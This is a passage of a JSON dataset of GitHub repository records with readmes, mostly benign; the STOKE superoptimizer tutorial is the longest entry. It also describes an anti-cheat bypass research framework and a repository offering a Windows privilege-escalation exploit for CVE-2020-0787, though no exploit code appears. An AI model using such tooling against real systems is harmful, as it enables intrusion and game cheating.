Imagine that we are solving the problems so fast.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "unity3d-jp/NormalPainter", "link": "https://github.com/unity3d-jp/NormalPainter", "tags": ["unity"], "stars": 659, "description": "vertex normal editor for Unity", "lang": "C++", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "MonaSolutions/MonaServer", "link": "https://github.com/MonaSolutions/MonaServer", "tags": [], "stars": 659, "description": "A lightweight RTMFP, RTMP, WebSocket and HTTP server!", "lang": "C++", "repo_lang": "", "readme": "MonaServer\n===========\n\n**MonaServer** is a new Web server born from the [Cumulus](https://github.com/OpenRTMFP/Cumulus) project.\n\nIn addition to **RTMFP** it includes **RTMP/RTMPE**, **WebSocket**, **HTTP**, a **NoDB** system and a lot of improvements.\n\nCheck our website to learn more about **MonaServer**: www.monaserver.ovh\n\nYou can talk with the **MonaServer** Community on the [MonaServer forum](https://groups.google.com/forum/#!forum/monaserver) or report a bug on the [issues](https://github.com/MonaSolutions/MonaServer/issues) page.\n\nMonaServer is licensed under the [GNU General Public License]; please contact us for a commercial licence at mathieupoux@gmail.com or jammetthomas@gmail.com.\n\nBinaries & Build\n------------------\n\nA [32-bit Windows zipped package](https://sourceforge.net/projects/monaserver/files/MonaServer_Win32.zip/download) is provided to quickly test MonaServer.\n\n**Note:** In order to use it you need the [C++ Redistributable Packages for Visual Studio 2013](http://www.microsoft.com/en-us/download/details.aspx?id=40784).\n\nWe recommend that you clone the GitHub sources and follow the [Installation instructions](http://www.monaserver.ovh/installation.html) for production use.\n\n\nVersions\n-----------\n\nThe meanings of the different types of branches/tags are described here:\n\n| Branch | Description |\n| ------------- |------------------------------------------------------------------------------------|\n| master | Latest committed version; use it at your own risk (even if we test each commit) |\n| tags | Stable versions (latest one is 1.2) |\n\nDonations\n-------------\n\nYou can contribute to the project by making a donation: [$] | [\u20ac].\n\n[GNU General Public License]: http://www.gnu.org/licenses/ \"www.gnu.org/licenses\"\n[$]: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=VXMEGJ2MFVP4C \"Donation US\"\n[\u20ac]: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=LW2NA26CNLS6G \"Donation EU\"\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "niemand-sec/AntiCheat-Testing-Framework", "link": "https://github.com/niemand-sec/AntiCheat-Testing-Framework", "tags": ["reverse-engineering", "cheats", "cplusplus", "exploit", "kernel", "windows", "anti-cheats"], "stars": 658, "description": "Framework to test any Anti-Cheat", "lang": "C++", "repo_lang": "", "readme": "# AntiCheat-Testing-Framework\nFramework to test any Anti-Cheat on the market. It can be used as a template or code base to test any anti-cheat and learn along the way. The barrier to entry for reversing anti-cheats and cheats is quite high; therefore, I'm releasing all the code I developed during my research.
The main idea is to help people and motivate them to get into this topic, which is really interesting and still has a lot left to research.\n\nAll this code is the result of research done for Recon2019 (Montreal) and BlackHat Europe 2019 (London). \n\nTwitter: [@Niemand_sec](https://twitter.com/niemand_sec)\n\nMore info: [Personal Blog](https://niemand.com.ar/)\n\n- **A description of each module can be found in its folder**.\n- Modules can be used together or separately. \n- Customization should be simple due to the modularity of the code.\n\n# Usage\n\nMost of the settings can be configured via the config.ini file; however, some modules may require particular settings in the code, depending on your intentions.\n\n> Remember to change the location of the config.ini file in CheatHelper/CheatHelper.cpp (variable configFile)\n\n# Modules (more coming in the future)\n\n- CheatHelper\n- DriverDisabler\n- DriverHelper\n- ExternalCheatDriver\n- DriverTester\n- HandleElevationDriver\n- HandleHijackingDLL\n- HandleHijackingMaster\n- LuaHook\n- StealthHijackingNormalDLL\n- StealthHijackingNormalMaster\n\n# About this Project\n\nAll this code is a result of the research presented at Recon 2019 and BlackHat Europe 2019: \"Unveiling the underground world of Anti-Cheats\"\n\nLinks: \n- First Release Info:\n - https://recon.cx/2019/montreal/\n - https://cfp.recon.cx/reconmtl2019/talk/MRJ3CN/\n- Second Release:\n - https://www.blackhat.com/eu-19/briefings/schedule/index.html#unveiling-the-underground-world-of-anti-cheats-17359\n \n \n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION", "link": "https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION", "tags": [], "stars": 658, "description": "Support ALL Windows Version", "lang": "C++", "repo_lang": "", "readme": "# CVE-2020-0787-EXP-ALL-WINDOWS-VERSION\n\n#### Statement ####\n\nThe author's PoC is provided for research purposes only; if readers use this PoC for any other activities, that has nothing to do with the author.\n\n#### Introduction\nCVE-2020-0787-EXP supports all Windows versions\n\n![pic](https://ftp.bmp.ovh/imgs/2020/06/bcf797d23480bb10.png)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "StanfordPL/stoke", "link": "https://github.com/StanfordPL/stoke", "tags": [], "stars": 657, "description": "STOKE: A stochastic superoptimizer and program synthesizer", "lang": "C++", "repo_lang": "", "readme": "[![Build Status](https://travis-ci.org/StanfordPL/stoke.svg?branch=develop)](https://travis-ci.org/StanfordPL/stoke)\n\nSTOKE\n=====\n\nSTOKE is a stochastic optimizer and program synthesizer for the x86-64 instruction set. STOKE uses random search to explore the extremely high-dimensional space of all possible program transformations. Although any one random transformation is unlikely to produce a code sequence that is desirable, the repeated application of millions of transformations is sufficient to produce novel and non-obvious code sequences. STOKE can be used in many different scenarios, such as optimizing code for performance or size, synthesizing an implementation from scratch, or trading accuracy of floating-point computations for performance.
As a superoptimizer, STOKE has been shown to outperform the code produced by general-purpose and domain-specific compilers, and in some cases expert hand-written code.\n\nIn addition to searching over programs, STOKE contains verification infrastructure to show the equivalence between x86-64 programs. STOKE can consider test cases, and it can perform anything from bounded verification all the way up to fully formal verification that shows equivalence for all possible inputs.\n\nSTOKE has appeared in a number of publications. For a thorough introduction to\nthe design of STOKE, see:\n\n- [**Stochastic Superoptimization** -- ASPLOS 2013](https://raw.githubusercontent.com/StanfordPL/stoke/develop/docs/papers/asplos13.pdf)\n- [**Data-Driven Equivalence Checking** -- OOPSLA 2013](https://raw.githubusercontent.com/StanfordPL/stoke/develop/docs/papers/oopsla13b.pdf)\n- [**Stochastic Optimization of Floating-Point Programs with Tunable Precision** -- PLDI 2014](https://raw.githubusercontent.com/StanfordPL/stoke/develop/docs/papers/pldi14a.pdf)\n- [**Conditionally Correct Superoptimization** -- OOPSLA 2015](https://raw.githubusercontent.com/StanfordPL/stoke/develop/docs/papers/oopsla15a.pdf)\n- [**Stochastic Program Optimization** -- CACM 2016](https://raw.githubusercontent.com/StanfordPL/stoke/develop/docs/papers/cacm16.pdf)\n- [**Stratified Synthesis: Automatically Learning the x86-64 Instruction Set** -- PLDI 2016](https://raw.githubusercontent.com/StanfordPL/stoke/develop/docs/papers/pldi16.pdf)\n- [**Sound Loop Superoptimization for Google Native Client** -- ASPLOS 2017](https://raw.githubusercontent.com/StanfordPL/stoke/develop/docs/papers/asplos17.pdf)\n- [**A Complete Formal Semantics of x86-64 User-Level Instruction Set Architecture** -- PLDI 2019](https://raw.githubusercontent.com/StanfordPL/stoke/develop/docs/papers/pldi19a.pdf)\n\nAdditionally, the work [**Semantic Program Alignment for Equivalence Checking** (PLDI 2019)](https://github.com/bchurchill/pldi19-equivalence-checker/raw/master/pldi2019.pdf) was developed from this codebase. The [fork is available here](https://github.com/bchurchill/pldi19-equivalence-checker).\n\n\nStatus of this Work\n=====\n\nSTOKE isn't production ready. It's a research prototype that demonstrates the viability of superoptimization techniques in various domains. It's not a general-purpose tool. The papers above describe specific areas where successes have been shown beyond the state of the art: in optimizing straight-line code, code where correctness can be relaxed (e.g. floating point), synthesizing semantic specifications for an instruction set, and in optimizing code containing loops with special compilation requirements (e.g. Google Native Client). We're not quite at the point where we can take a generic loop and expect to improve gcc/llvm -O3 code. In part, this is because these compilers have decades of work behind them to make them really great. \n\nAt this point, nobody is actively working on this code base. This repository now serves as an artifact for several of the above research papers. We will accept pull requests and answer inquiries as time permits.\n\n\nTable of Contents\n=====\n0. [Hardware Prerequisites](#hardware-prerequisites)\n1. [Using Docker](#using-docker)\n2. [Downloading and Building STOKE](#downloading-and-building-stoke)\n3. [Using STOKE](#using-stoke)\n 1. [Running Example](#running-example)\n 1. [Compiling and Disassembling Your Code](#compiling-and-disassembling-your-code)\n 1. [Test Case Generation](#test-case-generation)\n 1. 
[Final Configuration](#final-configuration)\n 1. [Starting STOKE](#starting-stoke)\n 1. [Rewriting the Binary](#rewriting-the-binary)\n 1. [Using the formal validator](#using-the-formal-validator)\n4. [Additional Features](#additional-features)\n5. [User FAQ](#user-faq)\n6. [Developer FAQ](#developer-faq)\n7. [Extending STOKE](#extending-stoke)\n 1. [Code Organization](#code-organization)\n 2. [Gadgets](#gadgets)\n 3. [Initial Search State](#initial-search-state)\n 4. [Search Transformations](#search-transformations)\n 5. [Cost Function](#cost-function)\n 6. [Live-out Error](#live-out-error)\n 7. [Verification Strategy](#verification-strategy)\n 8. [Command Line Args](#command-line-args)\n8. [Contact](#contact)\n\nHardware Prerequisites\n=====\n\nSTOKE will run on modern 64-bit x86 processors. It will run best on Haswell or\nnewer machines, but it can also run okay on Sandy Bridge. With Sandy Bridge\nprocessors, there won't be support for AVX2 instructions. \n\nIt should run on newer architectures, but we haven't tested it. However, stoke\nonly supports a subset of the instructions that were widely available when it was\ninitially developed. As a result, targets generated by newer compilers might not\nwork with STOKE. (Adding support for an instruction mostly involves adding a\nspreadsheet entry in the x64asm project, and optionally adding validator support.)\n\nUsing Docker\n=====\n\nSTOKE has many dependencies, and we think the best way to get up and running\nwith a development environment is to use docker. Simply run:\n\n $ sudo docker pull stanfordpl/stoke:latest\n\nThese docker images run an SSH server. We recommend starting the image like so:\n\n $ sudo docker run -d -P --name stoke stanfordpl/stoke:ARCH\n\nThen one can SSH in as follows:\n\n $ sudo docker port stoke 22\n 0.0.0.0:XXXXX\n\n $ ssh -pXXXXX stoke@127.0.0.1\n (password is 'stoke')\n\nOnce inside the container, STOKE can be configured and built:\n\n```\n./configure.sh\nmake\n```\n\nNote that there are other docker images from other travis-ci builds available\nin the stanfordpl/stoke-test repository. These should be available for recent\nbranches and pull requests, for example.\n\nYou can build your own docker images by running `docker build .` in\nthe top level of this repository. These are built upon the\n`stanfordpl/stoke-base:latest` image, which contains compiled versions of Z3\nand CVC4. If you want to upgrade Z3 or CVC4, it will require rebuilding these\nimages. The `Dockerfile.base` dockerfile may be used for this purpose (but\nit's not part of continuous integration, so it may require some manual work to\nget it to happen).\n\nDownloading and Building STOKE\n=====\n\nSTOKE should work on Ubuntu 14.04 and Ubuntu 16.04. Regardless of\ndistribution, the key to building stoke correctly is using gcc version 4.9. Below\nthat, the compiler doesn't support enough features to build our code. Above\nthat, there are some issues with an ABI change in gcc-5.\n\n $ sudo apt-get install bison ccache cmake doxygen exuberant-ctags flex g++-4.9 g++-multilib gcc-4.9 ghc git libantlr3c-dev libboost-dev libboost-filesystem-dev libboost-thread-dev libcln-dev libghc-regex-compat-dev libghc-regex-tdfa-dev libghc-split-dev libjsoncpp-dev python subversion libiml-dev libgmp-dev libboost-regex-dev autoconf libtool antlr pccts pkg-config\n\nNote that your distribution might not have g++-4.9 by default. You may\nconsider installing a PPA as described here:\nhttps://askubuntu.com/questions/466651/how-do-i-use-the-latest-gcc-4-9-on-ubuntu-14-04
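On Ubuntu 14.04 that typically looks like the following (a sketch assuming the widely used `ubuntu-toolchain-r/test` PPA that the link above describes):\n\n $ sudo add-apt-repository ppa:ubuntu-toolchain-r/test\n $ sudo apt-get update\n $ sudo apt-get install gcc-4.9 g++-4.9\n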
The rest of the dependencies will be fetched automatically as part of the build\nprocess.\n\nThe entire STOKE code base is available on GitHub under the Apache Software\nLicense version 2.0 at [github.com/StanfordPL/stoke](https://github.com/StanfordPL/stoke/). To check it out, type:\n\n $ git clone https://github.com/StanfordPL/stoke\n\nThis will check out the default `develop` branch. Unless you are looking for a\nspecific version or modification of STOKE, this is the branch to use. It\ncontains all the latest changes and is reasonably stable. This branch is\nsupposed to always pass all tests.\n\nSee the previous sections on how to download STOKE, a list of dependencies, and\nhow to check your hardware support level. The remainder of STOKE's software\ndependencies are available on GitHub and will be downloaded automatically the\nfirst time that STOKE is built. When you build STOKE the first time, run\n\n $ ./configure.sh\n\nThis will figure out the correct build parameters (such as the platform). To build STOKE, run\n\n $ make\n\nTo add STOKE and its related components to your path, type:\n\n $ export PATH=$PATH:/<path to stoke>/bin\n\nTo run the tests, type:\n\n $ make test\n\nThe files generated during the build process can be deleted by typing:\n\n $ make clean\n\nTo delete STOKE's dependencies as well (this is useful if an error occurs during the first build), type:\n\n $ make dist_clean\n\n\n\nUsing STOKE\n=====\n\nThe following toy example shows a typical workflow for using STOKE. All of the\nfollowing code can be found in the `examples/tutorial/` directory. As this\ncode is tested using our continuous integration system, the code there will\nalways be up to date, but this README can fall behind.\n\nRunning Example\n-----\n\nConsider a\nC++ program that repeatedly counts the number of bits (population count) in the\n64-bit representation of an integer. (Keeping track of a running sum prevents\n`g++` from eliminating the calls to `popcnt()` altogether.)\n\n```c++\n// main.cc\n\n#include <cstddef>\n#include <cstdint>\n#include <cstdlib>\n\nusing namespace std;\n\nsize_t popcnt(uint64_t x) {\n int res = 0;\n for ( ; x > 0; x >>= 1 ) {\n res += x & 0x1ull;\n }\n return res;\n}\n\nint main(int argc, char** argv) {\n const auto itr = atoi(argv[1]);\n\n auto ret = 0;\n for ( auto i = 0; i < itr; ++i ) {\n ret += popcnt(i);\n }\n\n return ret;\n}\n```\n\nCompiling and Disassembling your Code\n-----\n\nSTOKE is a compiler- and programming-language-agnostic optimization tool. It can\nbe applied to any x86-64 ELF binary. Although this example uses the GNU\ntoolchain, nothing prevents the use of other tools. To build this code with\nfull optimizations, type:\n\n $ g++ -std=c++11 -O3 -fno-inline main.cc\n \nNote that turning on optimizations (at least -O1) is helpful to remove unneeded stack operations and gives STOKE a better program to start from. When using STOKE for optimization, starting from a better program usually results in a better rewrite. To measure runtime, type:\n\n $ time ./a.out 100000000\n \n real 0m1.046s\n user 0m1.047s\n sys 0m0.000s\n \nA profiler will reveal that the runtime of `./a.out` is dominated by calls to\nthe `popcnt()` function.
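For example, with Linux `perf` (assuming it is installed; any profiler will do):\n\n $ perf record ./a.out 100000000\n $ perf report\n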
STOKE can be used to improve the implementation of\nthis function as follows. The first step is to disassemble the program by\ntyping:\n\n $ stoke extract -i ./a.out -o bins\n \nThis will produce a directory named `bins` that contains the text of every\nfunction contained in the binary `./a.out`. \n\nHelp for stoke or any of its subcommands can be obtained by typing:\n\n $ stoke -h\n $ stoke <subcommand> -h\n \nSTOKE can accept arguments either through the command line or through a\nconfiguration file. The invocation of `stoke extract` shown above is equivalent\nto the following:\n\n $ stoke extract --config extract.conf\n \nWhere `extract.conf` contains:\n\n```\n##### stoke extract config file\n\n-i ./a.out # Path to the elf binary to disassemble\n-o bins # Path to the directory to store disassembled text in\n```\n\nEvery STOKE subcommand can be used to generate example configuration files by\ntyping:\n\n $ stoke <subcommand> --example_config <path/to/config.conf>\n\nBecause `main.cc` was compiled using `g++`, the text of the `popcnt()` function\nwill appear under the mangled name `_Z6popcntm` in `bins/_Z6popcntm.s`.\n\n```asm\n .text\n .globl _Z6popcntm\n .type _Z6popcntm, @function\n_Z6popcntm:\n xorl %eax,%eax\n testq %rdi,%rdi\n je .L_4005b0\n nop\n.L_4005a0:\n movq %rdi,%rdx\n andl $0x1,%edx\n addq %rdx,%rax\n shrq $0x1,%rdi\n jne .L_4005a0\n retq\n.L_4005b0:\n retq\n nop\n nop\n .size _Z6popcntm, .-_Z6popcntm\n```\n\nTest Case Generation\n-----\n\nThe next step is to generate a set of testcases for guiding STOKE's search\nprocedure. There are a few ways of generating testcases:\n\n 1. Random generation + backtracking\n 2. Symbolic execution + random search\n 3. Custom test case generator\n 4. Dynamically recording execution data from a sample program\n\nOption 1 is the easiest to start with, but can be limited. It reliably works if there are no branches or instructions that trigger exceptions (like division). It tends to have trouble if the input code has both control flow branches and memory dereferences. To give this a try, one can run:\n\n`stoke testcase --target bins/_Z6popcntm.s --max_testcases 1024 -o popcnt.tc`\n\nIt will generate 1024 random test cases and save them in `popcnt.tc`. It will put random values in registers, and then try to fill in dereferenced memory locations with random values.\n\nOption 2 takes more compute time than option 1, and does well in different circumstances. It uses STOKE's formal verification tools to symbolically execute the code on paths up to a certain bound, generating a few test cases for each path. It uses random search to produce extra test cases beyond these. It's good for exercising corner cases in code. It tends to do poorly when (i) a loop executes a fixed, large number of iterations, meaning there are no short paths through the program; (ii) there's an exponential number of paths; or (iii) there are a lot of memory dereferences and the bound is high. In the case of the tutorial, a bound of 64 is needed to exercise all the relevant program paths, but the tool handles this:\n\n`stoke_tcgen --target bins/_Z6popcntm.s --bound 64 --output popcnt.tc`\n\nOption 3 means writing code to generate your own test cases for your problem. This gives you the most versatility and can be used in almost any situation. Often you can use a combination of domain knowledge and randomness to create test cases that thoroughly explore paths through the program, especially paths involving long-running loops. Combining options 2 and 3 is often powerful.
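As a toy illustration of option 3 for the running `popcnt` example (this is only a sketch of the \"domain knowledge plus randomness\" idea; it does not emit STOKE's on-disk testcase format, which is shown below), one might generate random inputs whose bit-widths vary so that values wider than 32 bits are well represented:\n\n```c++\n// Toy input generator: emit 1024 random 64-bit values with uniformly\n// chosen bit-widths, so wide values are exercised as well as narrow ones.\n#include <cstdint>\n#include <cstdio>\n#include <random>\n\nint main() {\n  std::mt19937_64 gen(0);\n  for (int i = 0; i < 1024; ++i) {\n    const int width = 1 + static_cast<int>(gen() % 64);     // bit-width in 1..64\n    const uint64_t mask = width == 64 ? ~0ull : (1ull << width) - 1;\n    std::printf(\"%016llx\\n\", static_cast<unsigned long long>(gen() & mask));\n  }\n  return 0;\n}\n```\n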
For a real-world example of this approach, see the code in `tools/apps/tcgen_tsvc.cc` in the `ddec-diophantine` branch. This code generates random test cases for a particular set of benchmarks that need arrays of fixed length and some static read-only data.\n\nLastly, option 4, dynamic instrumentation of a program, offers the flexibility of option 3 and (ideally) is easier to use. Right now, unfortunately, the tools are a bit buggy (see #971). When the tool is working, testcases can be obtained by typing:\n\n $ stoke testcase --config testcase.conf\n \nwhere `testcase.conf` contains:\n\n```\n##### stoke testcase config file\n\n--bin ./a.out # The name of the binary to use to generate testcases \n--args 10000000 # Command line arguments that should be passed to ./a.out\n--functions bins # Disassembly directory created by stoke extract\n\n-o tcs/_Z6popcntm # Path to file to write testcases to\n\n--fxn _Z6popcntm # The name of the function to generate testcases for\n--max_testcases 1024 # The maximum number of testcases to generate. \n```\n\nThe resulting file will contain 1024 entries, all of the form:\n\n```\nTestcase 0:\n\n%rax 00 00 00 00 00 98 96 80\n%rcx 00 00 00 00 00 00 00 00\n%rdx 00 00 00 00 00 00 00 0a\n%rbx 00 00 00 00 00 00 00 01\n%rsp 00 00 7f ff 97 44 36 28\n%rbp 00 00 00 00 00 00 00 00\n%rsi 19 99 99 99 99 99 99 99\n%rdi 00 00 00 00 00 00 00 00\n%r8 00 00 2a c9 68 1a 50 40\n%r9 00 00 7f ff 97 44 46 01\n%r10 00 00 00 00 00 98 96 80\n%r11 00 00 00 00 00 00 00 0a\n%r12 00 00 00 00 00 98 96 80\n%r13 00 00 7f ff 97 44 37 20\n%r14 00 00 00 00 00 00 00 00\n%r15 00 00 00 00 00 00 00 00\n\n%ymm0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00\n%ymm1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f\n%ymm2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 ff\n%ymm4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n\n%cf 0 \n%1 1 \n%pf 1 \n%0 0 \n%af 0 \n%0 0 \n%zf 0 \n%sf 0 \n%tf 0 \n%if 1 \n%df 0 \n%of 0 \n%iopl[0] 0 \n%iopl[1] 0 \n%nt 0 \n%0 0 \n%rf 0 \n%vm 0 \n%ac 0 \n%vif 0 \n%vip 0 \n%id 0 \n\n[ 00007fff 97443630 - 00007fff 97443620 ]\n[ 1 valid rows shown ]\n\n00007fff 97443628 d d d d d d d d 00 00 00 00 
00 40 04 6c\n\n[ 00000000 00000000 - 00000000 00000000 ]\n[ 0 valid rows shown ]\n\n[ 00000000 00000000 - 00000000 00000000 ]\n[ 0 valid rows shown ]\n\n0 more segment(s)\n```\n\nEach entry corresponds to the hardware state that was observed just prior to an\nexecution of the `popcnt()` function. The first 60 rows represent the contents\nof general purpose, sse, and eflags registers, and the remaining rows represent\nthe contents of memory, both on the stack and the heap. Memory is shown eight\nbytes at a time, where a block of eight bytes appears only if the target\ndereferenced at least one of those bytes. Each row contains values and state\nflags. Bytes are flagged as either (v)alid (the target dereferenced this byte)\nor (.) invalid (the target did not dereference this byte). \n\nFinal Configuration\n-----\n\nEach of the random transformations performed by STOKE is evaluated with\nrespect to the contents of this file. Rewrites are compiled into a sandbox and\nexecuted beginning from the machine state represented by each entry. Rewrites\nare only permitted to dereference defined locations. This includes registers\nthat are flagged as `def_in` (see `synthesize.conf`, below), memory locations that\nare flagged as 'v', or locations that were written previously. Rewrites are\npermitted to write values to all registers and to any memory location that is\nflagged as valid. \n\nSTOKE will produce optimal code that works on the testcases. The testcases\nneed to be selected to help ensure that STOKE doesn't produce an incorrect\nrewrite. In our main.cc file in `examples/tutorial` we choose arguments to the\n`popcnt` function to make sure that it sometimes provides arguments that use\nmore than 32 bits. Otherwise, STOKE will sometimes produce a rewrite using the\n`popcntl` instruction, which only operates on the bottom half of the register,\ninstead of the `popcntq` instruction, which operates on the whole thing.\nAlternatively, you can use the formal validator in bounded mode with a large\nbound (over 32). This large bound is tractable because this example has only\na small number of memory-aliasing cases (namely, none at all!). If a\ncounterexample is found, it can be automatically added to the search so STOKE\nwon't make this mistake again.\n\nThe STOKE sandbox will safely halt the execution of rewrites that perform\nundefined behavior. This includes leaving registers in a state that violates\nthe x86-64 callee-save ABI, dereferencing invalid memory, performing a\ncomputation that results in a floating-point exception, or becoming trapped in\na loop that performs more than `max_jumps` jumps (see `synthesize.conf`, below). \n\nStarting STOKE\n-----\n\nThe final step is to use these testcases and the target code contained in\n`bins/_Z6popcntm.s` to run STOKE search in synthesis mode (i.e., trying to find a program starting from the empty program) by typing:\n\n $ stoke synthesize --config synthesize.conf\n \nwhere `synthesize.conf` contains:\n\n```\n##### stoke search config file\n\n--out result.s # Path to write results to\n\n--target bins/_Z6popcntm.s # Path to the function to optimize\n\n--def_in \"{ %rdi }\" # The registers that are defined on entry to the target\n--live_out \"{ %rax }\" # The registers that are live on exit from the target\n\n--testcases popcnt.tc # Path to testcase file\n--training_set \"{ 0 ... 7 }\" # Testcases to use for measuring correctness during search\n--test_set \"{ 8 ... 
1023 }\" # Testcases to use as holdout set for checking correctness\n\n--distance hamming # Metric for measuring error between live-outs\n--misalign_penalty 1 # Penalty for results that appear in the wrong location\n--reduction sum # Method for summing errors across testcases\n--sig_penalty 9999 # Score to assign to rewrites that produce non-zero signals\n\n--cost \"correctness + latency\" # Measure performance by summing instruction latencies\n\n--global_swap_mass 0 # Proposal mass\n--instruction_mass 1 # Proposal mass\n--local_swap_mass 1 # Proposal mass\n--opcode_mass 1 # Proposal mass\n--operand_mass 1 # Proposal mass\n--rotate_mass 0 # Proposal mass\n\n--beta 1 # Search annealing constant\n--initial_instruction_number 5 # The number of nops to start with\n\n--statistics_interval 100000 # Print statistics every 100k proposals\n--timeout_iterations 16000000 # Propose 16m modifications total before giving up\n--cycle_timeout 1000000 # Try 1m modifications before restarting\n\n--strategy hold_out # Verify results using a larger hold out testcase set\n```\n\nSTOKE search will produce two types of status messages. Progress update\nmessages will be printed whenever STOKE discovers a new lowest cost verified or\nunverified rewrite. The code shown on the left is the lowest-cost code discovered\nso far, which is not yet known to be equivalent to the target; the code shown on\nthe right is the lowest-cost code known to be correct with respect to the current\nset of testcases.\n\n```\nProgress Update: \n\nLowest Cost Discovered (9) Lowest Known Correct Cost (15) \n \nbtrq $0xffffffffffffffc0, %rdi testq %rdi, %rdi \nretq je .L_X64ASM_0 \n xorl %eax, %eax \n .L_X64ASM_1: \n movl %edi, %edx \n andl $0x1, %edx \n addl %edx, %eax \n shrq $0x1, %rdi \n jne .L_X64ASM_1 \n cltq \n retq \n .L_X64ASM_0: \n xorl %eax, %eax \n retq\n```\n\nStatistics updates will be printed every `statistics_interval` proposals.\nStatistics are shown for the number of proposals that have taken place, elapsed\ntime, proposal throughput, and for each of the transformations specified to\nhave non-zero mass in `synthesize.conf`.\n\n```\nStatistics Update: \n\nIterations: 100000\nElapsed Time: 0.0836948s\nIterations/s: 1.19482e+06\n\nMove Type Proposed Succeeded Accepted \n \nInstruction 16.791% 5.83% 2.009% \nOpcode 16.646% 8.857% 4.013% \nOperand 16.593% 10.444% 6.864% \nRotate 16.611% 0.791% 0.789% \nLocal Swap 16.597% 1.556% 1.128% \nGlobal Swap 16.762% 7.066% 6.08% \nExtension 0% 0% 0%\n\nTotal 100% 34.544% 20.883%\n```\n\nWhen search has run to completion, STOKE will write the lowest cost verified\nrewrite that it discovered to `result.s`. Because this is a particularly simple\nexample, STOKE is almost guaranteed to produce the optimal rewrite:\n\n```asm\n .text\n .globl _Z6popcntm\n .type _Z6popcntm @function\n_Z6popcntm:\n popcnt %rdi, %rax\n retq\n .size _Z6popcntm, .-_Z6popcntm\n```\n\nRewriting the Binary\n-----\n\nThis result can then be patched back into the original binary by typing:\n\n $ stoke replace --config replace.conf\n \nwhere `replace.conf` contains:\n\n```\n##### stoke replace config file\n\n-i ./a.out # Path to the elf binary to patch\n--rewrite result.s # Path to the replacement function\n```\n\nAnd runtime can once again be measured by typing:\n\n $ time ./a.out 100000000\n \n real 0m0.133s\n user 0m0.109s\n sys 0m0.000s \n\nAs expected, the results are close to an order of magnitude faster than the original.\n\nUsing the Formal Validator\n-----\n\nSTOKE includes a formal validator. Its design and interface\nare detailed in the `src/validator/README.md` file. 
To use the formal\nvalidator instead of hold-out testing, specify `--strategy bounded` for any\nSTOKE binary that you use. For code with loops, all paths will be explored up\nto a certain depth, specified using the `--bound` argument, which defaults to 2. There's also `--strategy ddec`, which attempts to run the data-driven equivalence checking algorithm; however, the current implementation isn't very robust -- please file bug reports with (target, rewrite) pairs that fail to validate but should.\n\nThe bounded validator can be used to verify the example, but it takes a little while! One can run `make check` to do a fast check, or `stoke debug verify --def_in \"{ %rax %rdi }\" --live_out \"{ %rax }\" --target bins/_Z6popcntm.s --rewrite result.s --abi_check --strategy bounded --bound 64` to do a complete proof of equivalence. The faster check uses a bound of 8. Roughly speaking, this checks that the rewrite is correct when the input value is only 8 bits in size. Increasing the bound will check more cases, and when the bound is 64 it will check all of them, but running time is exponential in the bound.\n\nAnother example of using the validator can be found in the `examples/pairity`\nfolder; this example has a Makefile much like the tutorial's and should be easy\nto follow. The key difference is that the pairity example does not use\ntestcases to guide search. Instead, after producing a candidate rewrite, the\nvalidator checks for equivalence. If the codes are not equivalent, a\ncounterexample is found, and this is used as a new testcase to help guide\nsearch.\n\nThere are some important limitations to keep in mind while using the validator:\n\n- Only some instructions are supported. The `--validator_must_support` flag\ncan be used to only propose instructions that can be validated.\n- Only the general purpose registers, SSE registers (`ymm0`-`ymm15`) and five of\nthe status flags (`CF`, `SF`, `PF`, `ZF`, `OF`) are supported.\n- Memory is now fully supported, even in the presence of complex aliasing.\n\n\nAdditional Features\n=====\n\nIn addition to the subcommands 